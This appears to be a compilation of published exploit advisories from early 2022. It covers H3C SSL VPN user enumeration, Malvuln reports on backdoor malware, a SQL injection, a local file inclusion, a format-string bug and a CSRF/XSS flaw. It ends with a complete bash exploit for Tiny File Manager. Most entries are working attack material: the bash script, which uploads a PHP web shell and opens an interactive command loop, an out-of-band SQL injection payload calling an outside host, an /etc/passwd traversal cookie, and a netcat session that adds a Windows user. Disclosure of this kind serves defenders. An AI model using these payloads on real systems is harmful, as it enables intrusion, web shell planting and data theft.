<pre><code><br />H3C SSL VPN Username Enumeration<br /><br /><br />Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd.<br />Product web page: https://www.h3c.com<br />Affected version: n/a<br /><br />Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees<br />to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a<br />new generation of professional SSL VPN devices for enterprises. They can function as ingress<br />gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are<br />for small-to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized<br />enterprises.<br /><br />Desc: The weakness is caused due to the login script and how it verifies provided credentials. An<br />attacker can use this weakness to enumerate valid users on the affected application via 'txtUsrName'<br />POST parameter.<br /><br />Tested on: ssl vpn gateway HttpServer 1.1<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5697<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php<br /><br /><br />24.01.2022<br /><br />--<br /><br /><br />Non-valid:<br />----------<br /><br />POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi<br /><br />txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode=<br /><br /><br /> <tr><td align="center">User is not exist</TD></TR><br /><br /><br /><br />Valid:<br />------<br /><br />POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi<br /><br />txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode=<br /><br /> <tr><td align="center">Input password incorrect</TD></TR><br /><br /><br /><br />Valid:<br />------<br /><br />POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi<br /><br />txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode=<br /><br /> <tr><td align="center">Local user state is inactive</TD></TR><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/991c1f02c809cee860cb712896a45338.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Ncx.b<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 99. Third-party attackers who can reach an infected system can execute OS commands further compromising the host.<br />Type: PE32<br />MD5: 991c1f02c809cee860cb712896a45338<br />Vuln ID: MVID-2021-0421<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 99<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\Users\Victim\Desktop>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\Users\Victim\Desktop>net user HYP3RLINX HELL /add<br />net user HYP3RLINX HELL /add<br />The command completed successfully<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Simple Bakery Shop Management System v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.14.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15174/simple-bakery-shop-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The username parameter from Simple Bakery Shop Management System v1.0<br />appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\uecbuk5uwc33xkpj8ty1fdix5obhz9n0qoib8zx.https://www.sourcecodester.com/php/15174/simple-bakery-shop-management-system-phpoop-free-source-code.html\\zgr'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. The attacker can be retrieving all<br />information about all<br />accounts of this system. The malicious actor can use this information<br />for malicious purposes!<br />WARNING: If this is in some external domain, or some subdomain, or<br />internal, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=gqHxMzWA'+(select<br />load_file('\\\\uecbuk5uwc33xkpj8ty1fdix5obhz9n0qoib8zx.https://www.sourcecodester.com/php/15174/simple-bakery-shop-management-system-phpoop-free-source-code.html\\zgr'))+''<br />AND (SELECT 4660 FROM (SELECT(SLEEP(3)))XYJd) AND<br />'Irjn'='Irjn&password=y0C!l3w!Q5<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Simple-Bakery-Shop-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/9m854x)<br /><br /></code></pre>
<pre><code># Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)<br /># Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"<br /># Date: 11/12/2021<br /># Exploit Author: Momen Eldawakhly (Cyber Guy)<br /># Vendor Homepage: N/A<br /># Version: V2.0<br /># Tested on: Nginx NVRDVRIPC Web Server<br /><br />Proof of Concept:<br /><br />GET /language/lang HTTP/1.1<br />Referer: http://example.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36<br />Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate,br<br />Host: VulnIP<br />Connection: Keep-alive<br /><br /></code></pre>
<pre><code><br /># Exploit Title: Slurp 1.10.2 - Remote Format String Date: 2022-02-12<br /><br /># Author: Milad Karimi<br /><br /><br /><br /><br />slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems.<br /><br /><br /><br /><br />It may be possible for a remote server to execute code on a vulnerable client. slurp offers functionality that allows the software to write messages to the system log. A format string vulnerability in the syslog function may allow a malicious server to supply a custom format string that writes to an arbitrary address in memory.<br /><br /><br /><br /><br />perl -e 'print "BY BY BY \n666 %x%x%x\n'" | nc -l -p 112<br /><br /><br /><br /><br />Then check /var/log/messages for something like:<br /><br /><br /><br /><br />slurp[39926]: do_newnews: NNTP protocol error: got '666 bfbff4f8804bc1bbfbff51c'<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Nucleroot.mf<br />Vulnerability: Stack Buffer Overflow<br />Description: Description: MaskPE by yzkzero is a tool for implanting backdoors in existing PE files. The Backdoor tool doesnt properly check the files it loads and falls victim to a file based local buffer overflow.<br />Type: PE32<br />MD5: 8de56eef118187a89eeab972288ce94d<br />Vuln ID: MVID-2021-0420 <br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 12/11/2021<br /><br />Memory Dump:<br />(1790.60): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=41414101 esi=00000003 edi=00000003<br />eip=7770ed3c esp=0019e7a8 ebp=0019e938 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:000> .ecxr<br />eax=454e4141 ebx=771fb900 ecx=41414141 edx=41414101 esi=0019fbe8 edi=0019fbe8<br />eip=004090e3 esp=0019f0c8 ebp=025a43e8 iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206<br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d<br />Backdoor_Win32_Nucleroot_mf+0x90e3:<br />004090e3 813850450000 cmp dword ptr [eax],4550h ds:002b:454e4141=????????<br /><br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br /><br />FAULTING_IP: <br />Backdoor_Win32_Nucleroot_mf+90e3<br />004090e3 813850450000 cmp dword ptr [eax],4550h<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 004090e3 (Backdoor_Win32_Nucleroot_mf+0x000090e3)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 454e4141<br />Attempt to read from address 454e4141<br /><br />PROCESS_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 454e4141<br /><br />READ_ADDRESS: 454e4141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Nucleroot_mf+90e3<br />004090e3 813850450000 cmp dword ptr [eax],4550h<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00000060<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 004049b2 to 004090e3<br /><br />STACK_TEXT: <br />WARNING: Stack unwind information not available. Following frames may be wrong.<br />0019f0c8 004049b2 00000001 0019fb74 0019f438 Backdoor_Win32_Nucleroot_mf+0x90e3<br />0019fc1c 77408654 000000b8 00000000 026a1600 Backdoor_Win32_Nucleroot_mf+0x49b2<br />0042fba0 00403690 004012a0 00420e01 0042167d kernel32!BaseThreadInitThunk+0x24<br />0042fba8 00420e01 0042167d 004255fe 0042565f Backdoor_Win32_Nucleroot_mf+0x3690<br />0042fbac 0042167d 004255fe 0042565f 00425604 Backdoor_Win32_Nucleroot_mf+0x20e01<br />0042fbb0 004255fe 0042565f 00425604 00425604 Backdoor_Win32_Nucleroot_mf+0x2167d<br />0042fbb4 0042565f 00425604 00425604 00425607 Backdoor_Win32_Nucleroot_mf+0x255fe<br />0042fbb8 00425604 00425604 00425607 004021b0 Backdoor_Win32_Nucleroot_mf+0x2565f<br />0042fbbc 00425604 00425607 004021b0 00425664 Backdoor_Win32_Nucleroot_mf+0x25604<br />0042fbc0 00425607 004021b0 00425664 00425615 Backdoor_Win32_Nucleroot_mf+0x25604<br />0042fbc4 004021b0 00425664 00425615 00425659 Backdoor_Win32_Nucleroot_mf+0x25607<br />0042fbc8 00425664 00425615 00425659 00421982 Backdoor_Win32_Nucleroot_mf+0x21b0<br />0042fbcc 00425615 00425659 00421982 0042561b Backdoor_Win32_Nucleroot_mf+0x25664<br />0042fbd0 00425659 00421982 0042561b 00425655 Backdoor_Win32_Nucleroot_mf+0x25615<br />0042fbd4 00421982 0042561b 00425655 0042565f Backdoor_Win32_Nucleroot_mf+0x25659<br />0042fbd8 0042561b 00425655 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x21982<br />0042fbdc 00425655 0042565f 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x2561b<br />0042fbe0 0042565f 0042565f 0042565f 00420d33 Backdoor_Win32_Nucleroot_mf+0x25655<br />0042fbe4 0042565f 0042565f 00420d33 00422195 Backdoor_Win32_Nucleroot_mf+0x2565f<br />0042fbe8 0042565f 00420d33 00422195 0042214c Backdoor_Win32_Nucleroot_mf+0x2565f<br />0042fbec 00420d33 00422195 0042214c 00423e5e Backdoor_Win32_Nucleroot_mf+0x2565f<br />0042fcec 00420d4d 00420d33 00690053 0065007a Backdoor_Win32_Nucleroot_mf+0x20d33<br />0042fcf0 00420d33 00690053 0065007a 0066004f Backdoor_Win32_Nucleroot_mf+0x20d4d<br />0042fcf4 00690053 0065007a 0066004f 006d0049 Backdoor_Win32_Nucleroot_mf+0x20d33<br />0042fcf8 0065007a 0066004f 006d0049 00670061 0x690053<br />0042fcfc 0066004f 006d0049 00670061 00000065 0x65007a<br />0042fd00 006d0049 00670061 00000065 00610042 0x66004f<br />0042fd04 00670061 00000065 00610042 00650073 0x6d0049<br />0042fd08 00000000 00610042 00650073 0066004f 0x670061<br /><br /><br />STACK_COMMAND: ~0s; .ecxr ; kb<br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: Backdoor_Win32_Nucleroot_mf+90e3<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Nucleroot_mf<br /><br />IMAGE_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 4456df74<br /><br />FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Nucleroot_mf+90e3<br /><br /><br />Exploit/PoC:<br />python -c "print( 'MZ'+'A'*20000)" > DOOM.exe<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code><br /># Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross-Site Request Forgery (CSRF)<br /><br /># Date: 2022-02-09<br /><br /># Author: Milad Karimi <br /><br /># Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/<br /><br /># Version: 1.2<br /><br /># Tested on: Windows 11<br /><br /># CVE: CVE-2022-24272<br /><br /><br /><br /><br />1. Description:<br /><br />The plugin International Sms For Contact Form 7 Integration for class-sms-log-display.php and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. <br /><br />Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue<br /><br /><br /><br /><br />2. Proof of Concept:<br /><br /><br /><br /><br /><form method="post" action="https://example.com/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page="><br /><br /> <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]"><br /><br /> <input type="submit" value="Save" name="submit"><br /><br /></form><br /><br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a83989d36f3b443a757eef1c99f1a373.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Asylum.014<br />Vulnerability: Cleartext Password Storage<br />Description: Asylum v0.1.4 (Fearless Edition) has a proxy feature. The proxy credentials are stored in the Windows registry in cleartext under HKLM\SOFTWARE\WOW6432Node in a key named "Asylum".<br />Type: PE32<br />MD5: a83989d36f3b443a757eef1c99f1a373<br />Vuln ID: MVID-2021-0419<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Asylum<br /><br />ProxyUsername<br />HATE<br /><br />ProxyPassword <br />abc123<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Tiny File Manager <= 2.4.3 Authenticated RCE exploit<br /># By FEBIN<br /># ./exploit.sh <URL> <Admin Username> <Password><br /># Example: ./exploit.sh http://files.ubuntu.local/index.php admin "admin@123"<br /># https://github.com/febinrev/tinyfilemanager-2.4.3-exploit<br />#<br />#!/bin/bash<br /><br />check(){<br /><br />which curl<br />if [ $? = 0 ]<br />then<br />printf "[✔] Curl found! \n"<br />else<br />printf "[❌] Curl not found! \n"<br />exit<br />fi<br /><br />which jq<br />if [ $? = 0 ]<br />then<br />printf "[✔] jq found! \n"<br />else<br />printf "[❌] jq not found! \n"<br />exit<br />fi<br />}<br />usage(){<br /><br />printf "<br />TIny File Manager Authenticated RCE POC Exploit.<br /><br />By FEBIN<br /><br />$0 <URL> <Admin Username> <Password><br /><br />Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\"<br /><br />"<br />}<br /><br />log-in(){<br />URL=$1<br />admin=$2<br />pass=$3<br />cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1)<br /><br />if [ $cookie ]<br />then<br />printf "\n[+] Login Success! Cookie: $cookie \n"<br />else<br />printf "\n[-] Logn Failed! \n"<br />fi<br /><br />URL=${URL}<br />}<br /><br />find_webroot(){<br /><br /><br />webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" )<br /><br /><br />if [ $webroot ]<br />then<br />printf "\n[*] Try to Leak Web root directory path \n\n"<br />printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n" <br />else<br />printf "[-] Can't find WEBROOT! Using default /var/www/html \n"<br />webroot="/var/www/html"<br />fi<br />}<br /><br />upload(){<br /><br />#webroot="/var/www/tiny/"<br />shell="shell$RANDOM.php"<br />echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell<br /><br /><br /><br />curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful"<br /><br /><br />}<br /><br />exploit(){<br /><br />WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/")<br /><br />upload<br /><br /><br />if [ $? = 0 ]<br />then<br />printf "[+] File Upload Successful! \n"<br />else<br />printf "[-] File Upload Unsuccessful! Exiting! \n"<br />exit 1<br />fi<br /><br /><br />printf "[+] Checking for the shell \n"<br /><br /><br />curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null<br />if [ $? = 0 ]<br />then<br />printf "[+] Shell found ${WEB_URL}/$shell \n"<br />else <br />printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"<br />exit 2<br />fi<br /><br />printf "[+] Getting shell access! \n\n"<br /><br />while true<br />do<br />printf "$> "<br />read cmd<br />curl ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}"<br />done<br />}<br /><br />if [ $1 ] && [ $2 ] && [ $3 ]<br />then<br />check<br />log-in $1 $2 $3<br /><br />find_webroot<br /><br /><br />exploit<br />else<br />usage<br />fi<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/f93e64ac9c3383d0df23662a78a76c07.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.IRC.Subhuman<br />Vulnerability: Unauthenticated Open Proxy<br />Description: The malware listens on TCP port 1029. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br />Type: PE32<br />MD5: f93e64ac9c3383d0df23662a78a76c07<br />Vuln ID: MVID-2021-0418<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />curl socks4://192.168.18.125:1029 http://192.168.18.128:21<br />220 INetSim FTP Service ready.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>